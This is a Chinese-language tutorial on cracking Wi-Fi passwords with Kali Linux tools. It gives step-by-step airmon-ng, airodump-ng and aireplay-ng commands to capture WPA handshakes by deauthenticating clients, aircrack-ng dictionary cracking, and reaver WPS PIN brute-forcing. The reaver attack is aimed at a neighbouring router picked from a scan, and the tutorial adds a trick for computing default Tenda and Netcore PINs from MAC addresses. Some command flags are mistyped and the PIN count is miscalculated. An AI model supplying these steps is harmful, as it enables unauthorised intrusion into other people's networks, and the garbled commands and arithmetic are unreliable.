准備工具
1.筆記本
2.USB無線上網卡(必備)
3.kali系統
4.密碼字典
第一種方法
暴力破解法
何為暴力破解呢,其實就是一個一個密碼去試,直到正確的密碼。
現在的wifi一般加密都是:
1. WEP(有線等效加密)——采用WEP64位或者128位數據加密。
2.WPA-PSK[TKIP]———采用預共享秘鑰的WI-FI保護訪問,采用WPA-PSK標准加密技術,加密類型為TKIP。
3.WPA-PSK[TKIP]+WPA2-PSK[AES]———允許客戶端使用WPA-PSK[TKIP]或者WPA2-PSK[AES]。
進入正題:
1. 第一步
進入kali在終端輸入如下
airmon-ng
列出網卡信息
2. 第二步
輸入:
airmon-ng start wlan0
開啟網卡監控
可以使用ifconfig命令查看一下網卡信息:
ifconfig
可以看到網卡的名字已經變了
3. 第三步
airodump-ng wlan0mon
掃描wifi信號
這里我用自己家的wifi做實驗
4. 第四步
上圖可以看出
BSSID是50:3A:A0:33:B2:8C 信道(CH)是:2
輸入:
airodump-ng -w freedom -c 2 -–bssid 50:3A:A0:33:B2:8C wlan0mon –ignore-negative-one
抓去握手包
-c:指定信道
-w:指定抓去握手包的存放位置或者名字,freedom是一會抓去的握手包的名字
--bssid:指定路由器的MAC
5. 第五步
再開一個終端輸入命令:
aireplay-ng – -deatu 10 -a 路由器MAC -c 客戶機MAC wlan0mon – -ignore-negative-one
使用airplay-ng工具強制斷開已經連接到wifi的設備重新連接路由器,來進行抓去數據包
–deatu:指定發送反認證包的個數,也可以使用-0(阿利伯數字0)來指定反認證包的個數
-a:指定路由器的MAC
-c:指定客戶機的MAC
6. 第六步
破解握手包
aircrack-ng -a -w dict freedom-*.cap
-a1:指定WEP加密方式
-a2:指定WPA-PSk加密方式
dict:字典的名字
freedom-*.cap:握手包
這個就是我的wifi密碼
破解完成,成功與否靠強大的字典和運氣了。
第二種方法
1.第一步
Wash掃描開啟WPS的網絡
wash -i wlan0mon [-C]
小編周圍沒有開啟WPS功能的wifi,就會出現上圖那樣,這咋辦。。。
不要急,因為有些隱藏了起來,我們直接霸王硬上弓
用前面那個掃wifi的命令:
airodump-ng wlan0mon
看見小編圈起來的MAC沒有,選擇一個PWR的值的絕對值小於70的wifi破解
2. 第二步
選擇一個路由器
我在這選擇的是名字為:FAST_F70E的wifi
就他了:E4:D3:32:7F:F7:0E -45 2 0 0 6 54e. WPA2 CCMP PSK FAST_F70E
然后命令如下:
reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S -vv
E4:D3:32:7F:F7:0E 這個mac根據路由器的mac更改,我破解的wifi的mac是E4:D3:32:7F:F7:0E
如圖上表示可以破解,開啟了wps功能
出現上圖這樣,就表示不能破解換其他wifi破解吧孩子
這樣就表示破解出來了
小知識:
如果密碼被改了你知道他wifi的pin碼就用如下命令:reaver-i mon0 -b MAC -p PIN
pin碼有8位:所以就是10的8次方,要窮舉1000000000次
這樣pin也是有限制的,比如要被pin出的路由器必須得開啟wps功能;貌似現在很多都是防pin路由器或300秒pin限制的。
有些路由pin碼可以通過計算得到:騰達和磊科的產品如果路由MAC地址是以“C83A35”或“00B00C”打頭那么可以直接計算出PIN值。
比如這個:bssid :Tenda_579A18 mac :C8:3A:35:57:9A:18 通過計算器將mac后6位換算成10進制數,得到5741080(pin碼的前7位),最多試10次或通過軟件得到該路由pin碼!
破解時推薦這個命令:
reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S –d9 –t9 -vv
因為–d9 –t9參數可以防止pin死路由器。